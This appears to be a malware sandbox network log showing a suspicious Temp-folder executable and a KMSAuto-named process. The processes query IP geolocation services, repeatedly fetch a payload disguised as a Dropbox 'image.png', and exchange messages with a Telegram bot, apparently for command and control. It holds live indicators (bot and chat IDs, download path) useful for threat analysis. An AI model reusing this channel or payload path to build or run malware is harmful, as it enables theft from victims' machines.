2024-07-06 11:27:20 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:27:20 GMT Content-Type: application/json Content-Length: 1389 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-06 11:27:20 UTC	1389	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 36 33 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 30 32 36 35 32 34 30 2c 22 74 65 78 74 22 Data Ascii: {"ok":true,"result":{"message_id":26306,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265240,"text"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49755	188.114.96.3	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:21 UTC	67	OUT	GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2024-07-06 11:27:21 UTC	641	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 06 Jul 2024 11:27:21 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Sat, 06 Jul 2024 12:27:21 GMT Location: https://ipbase.com/xml/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sybfj2Fs%2BfRjTfmxwPk1AmoYdgsJu3uUFljUT8edelxdkmIOPp9R%2BjtHkrCOicyvJAecq1d52XbsCr0t3kRPTOgS4DqmGqoV7AI%2BVMdFfxxe4aMcZ%2FN9szHOlDacjZIJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ec1fd787ca5-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:27:21 UTC	167	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49754	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:21 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-06 11:27:22 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:21 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 070ae673771847d5ae90f26a1e675131 Connection: close
2024-07-06 11:27:22 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49756	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:21 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-06 11:27:22 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:21 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 67cfd327a89144d898cb8e260c519356 Connection: close
2024-07-06 11:27:22 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49757	172.67.209.71	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:22 UTC	64	OUT	GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
2024-07-06 11:27:22 UTC	740	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Jul 2024 11:27:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Age: 0 Cache-Control: public,max-age=0,must-revalidate Cache-Status: "Netlify Edge"; fwd=miss Vary: Accept-Encoding X-Nf-Request-Id: 01J23WRXZC0BM4165B5GPY1TFE CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UZrlvMPaDSEnXkSG0na44T4RaaVoVJuAy5tb8vAOvgyXsnn5QpS51%2B4%2Fh97bvolDxS4QcDEQ0h7X83MUaaO%2Fo%2BrE6HS9n%2FoXC4HgS5RM48xBA5mi2FRCMwRMN44"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ec62affc454-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:27:22 UTC	629	IN	Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-07-06 11:27:22 UTC	1369	IN	Data Raw: 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 Data Ascii: dding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; heig
2024-07-06 11:27:22 UTC	1091	IN	Data Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.
2024-07-06 11:27:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49758	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:23 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:23 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:23 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 6246558552fc497ea997b7ceeb858b05 Connection: close
2024-07-06 11:27:23 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49759	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:23 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:24 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:23 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: b02ec5d1db054e08a299c1bb129ccbec Connection: close
2024-07-06 11:27:24 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49761	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:24 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:25 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:24 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 3fe90cbb8d934200afd5692c2a9f517e Connection: close
2024-07-06 11:27:25 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49763	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:25 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:25 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:25 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 5ac34c91208a4ed68d1539c76461bd4d Connection: close
2024-07-06 11:27:25 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49765	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:25 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:26 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:26 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 19257cddd1964a18937af02c4451b113 Connection: close
2024-07-06 11:27:26 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49768	162.125.66.15	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:27 UTC	83	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com
2024-07-06 11:27:28 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:27:27 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: e45280295d66465c8ce5cde1d8f2f655 Connection: close
2024-07-06 11:27:28 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49767	149.154.167.220	443	7324	C:\ProgramData\KMSAuto\accc.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:27:27 UTC	1275	OUT	GET 